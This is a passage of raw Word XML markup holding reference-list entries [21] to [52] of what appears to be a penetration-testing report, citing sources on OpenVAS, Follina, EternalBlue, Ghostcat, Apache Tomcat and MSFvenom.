              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[21]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“Oracle VM VirtualBox | Oracle Technology Network | Oracle.” https://www.oracle.com/virtualization/technologies/vm/virtualbox.html (accessed Jul. 10, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="66F303D8" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="45182627"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[22]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“Some ethical hacking possibilities in Kali Linux environment - ProQuest.” https://www-proquest-com.ezproxy.uwtsd.ac.uk/docview/2394928471?pq-origsite=primo&amp;accountid=130472 (accessed Sep. 07, 2021).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="13E75215" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="445320143"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[23]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“Some ethical hacking possibilities in Kali Linux environment - ProQuest.” https://www.proquest.com/docview/2394928471?accountid=130472&amp;parentSessionId=q8mlchcyUA37lc6kvXYE7w67bja9GdG43SQGzXvly5I%3D&amp;pq-origsite=primo (accessed Aug. 04, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2C44B696" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="489904224"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[24]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“OpenVAS vs. Nessus - A Comprehensive Analysis | Intruder.” https://www.intruder.io/blog/openvas-vs-nessus (accessed Jul. 09, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="631D72DB" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1929927345"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[25]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“About Greenbone Community Feed (GCF) - Feed Services (GCF &amp; GSF) - Greenbone Community Portal.” https://community.greenbone.net/t/about-greenbone-community-feed-gcf/1224 (accessed Jul. 09, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7BCC17A4" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1438939496"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:t>[26]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“A brief introduction to the OpenVAS vulnerability scanner - Infosec Resources.” https://resources.infosecinstitute.com/topic/a-brief-introduction-to-the-openvas-vulnerability-scanner/ (accessed Jul. 09, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5FB3F7D8" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1175997220"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[27]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>E. Altuncu, K. Bicakci, and M. U. Aksu, “A First Look at the Usability of OpenVAS Vulnerability Scanner”, doi: 10.14722/usec.2019.23026.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="163810AF" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="902444353"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[28]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“Background — Greenbone Community Documentation documentation.” https://greenbone.github.io/docs/latest/background.html#history-of-the-openvas-project (accessed Jul. 10, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7FE4BCAC" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="238101220"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[29]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>T. Benjamin Altpeter, “An Analysis of the State of Electron Security in the Wild Declaration of Authorship,” 2020.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="05270E0C" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="254635555"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[30]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“Follina — a Microsoft Office code execution vulnerability | by Kevin Beaumont | May, 2022 | DoublePulsar.” https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e (accessed Jul. 09, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="465283B4" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1387098363"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[31]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“CVE-2022-30190 - Security Update Guide - Microsoft - Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.” https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190 (accessed Jul. 09, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="669363B5" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="66533992"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[32]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“Rapid Response: Microsoft Office RCE - ‘Follina’ MSDT Attack.” https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug (accessed Jul. 30, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3F65165B" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="921522948"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[33]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“Follina — a Microsoft Office code execution vulnerability | by Kevin Beaumont | May, 2022 | DoublePulsar.” https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e (accessed Jul. 17, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="241787B6" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1591619456"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:t>[34]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“Windows 10 RCE: The exploit is in the link | Positive Security.” https://positive.security/blog/ms-officecmd-rce (accessed Jul. 17, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="35BE251D" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1568954825"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[35]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“NVD - CVE-2016-2183.” https://nvd.nist.gov/vuln/detail/CVE-2016-2183 (accessed Jul. 10, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5AA294C3" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="482740551"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[36]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“CVE-2022-30190: Microsoft Support Diagnostic Tool (MSDT) RCE Vulnerability ‘Follina’ | FortiGuard Labs .” https://www.fortinet.com/blog/threat-research/analysis-of-follina-zero-day (accessed Jul. 17, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2A31E4C4" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="2014450211"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[37]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“Protecting customers and evaluating risk – Microsoft Security Response Center.” https://msrc-blog.microsoft.com/2017/04/14/protecting-customers-and-evaluating-risk/ (accessed Jun. 22, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="57220A92" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1277059860"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[38]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>Z. Liu, “Working mechanism of Eternalblue and its application in ransomworm,” Dec. 2021, [Online]. Available: http://arxiv.org/abs/2112.14773</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4FFC54EF" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="295725684"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[39]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“Exploitation of EternalBlue DoublePulsar [Windows 7 – 64bit] with Metasploit Framework - Yeah Hub.” https://www.yeahhub.com/exploitation-eternalblue-doublepulsar-windows-7-64bit-metasploit-framework/ (accessed Jun. 20, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1E53431F" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="274141339"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[40]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“EternalBlue - Everything There Is To Know - Check Point Research.” https://research.checkpoint.com/2017/eternalblue-everything-know/ (accessed Jun. 22, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7B42BE1F" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="617757470"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[41]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t xml:space="preserve">M. Akbanov, V. G. Vassilakis, and M. D. Logothetis, “WannaCry ransomware: Analysis of infection, persistence, recovery prevention and propagation mechanisms,” </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
              <w:i/>
              <w:iCs/>
            </w:rPr>
            <w:t>Journal of Telecommunications and Information Technology</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>, no. 1, pp. 113–124, 2019, doi: 10.26636/JTIT.2019.130218.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4A849E80" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="414279026"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:t>[42]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“Apache Tomcat® - Welcome!” https://tomcat.apache.org/ (accessed Jun. 25, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5CC17C6D" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1993950368"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[43]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“CVE-2020-1938: Ghostcat vulnerability.” https://www.chaitin.cn/en/ghostcat (accessed Jun. 25, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="05CF38F8" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1441142215"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[44]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“What is Middleware - Definition and Examples | Microsoft Azure.” https://azure.microsoft.com/en-in/overview/what-is-middleware/ (accessed Jun. 25, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="79C92DA0" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="246233436"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[45]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“Detailed Analysis of Ghostcat Vulnerability (Cve-2020–1938) in Apache Tomcat Servers | by Cyber Defecers | InfoSec Write-ups.” https://infosecwriteups.com/detailed-analysis-of-ghostcat-vulnerability-cve-2020-1938-in-apache-tomcat-servers-and-using-it-736146c986a3 (accessed Jun. 25, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="35E8416C" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="374431318"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[46]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“Detailed Analysis of Ghostcat Vulnerability (Cve-2020–1938) in Apache Tomcat Servers | by Cyber Defecers | InfoSec Write-ups.” https://infosecwriteups.com/detailed-analysis-of-ghostcat-vulnerability-cve-2020-1938-in-apache-tomcat-servers-and-using-it-736146c986a3 (accessed Jun. 25, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2A228E19" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1055277905"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[47]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“Apache Tomcat® - Apache Tomcat 7 vulnerabilities.” https://tomcat.apache.org/security-7.html (accessed Jul. 12, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0AB221F6" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="159005532"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[48]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“GitHub - mgeeky/tomcatWarDeployer: Apache Tomcat auto WAR deployment &amp; pwning penetration testing tool.” https://github.com/mgeeky/tomcatWarDeployer (accessed Jul. 12, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6ECD9BC7" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1089109915"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:t>[49]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“MSFvenom - Metasploit Unleashed.” https://www.offensive-security.com/metasploit-unleashed/msfvenom/ (accessed Jul. 12, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="60DE1116" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="2139715350"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[50]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“GitHub - g0tmi1k/msfpc: MSFvenom Payload Creator (MSFPC).” https://github.com/g0tmi1k/msfpc (accessed Jul. 12, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="42425322" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1049450606"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[51]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>R. Chandel, “Hacking: MSFvenom”.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="057C068A" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="446509230"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[52]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t xml:space="preserve">J. ’Creswell and D. ’Creswell, </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
              <w:i/>
              <w:iCs/>
            </w:rPr>
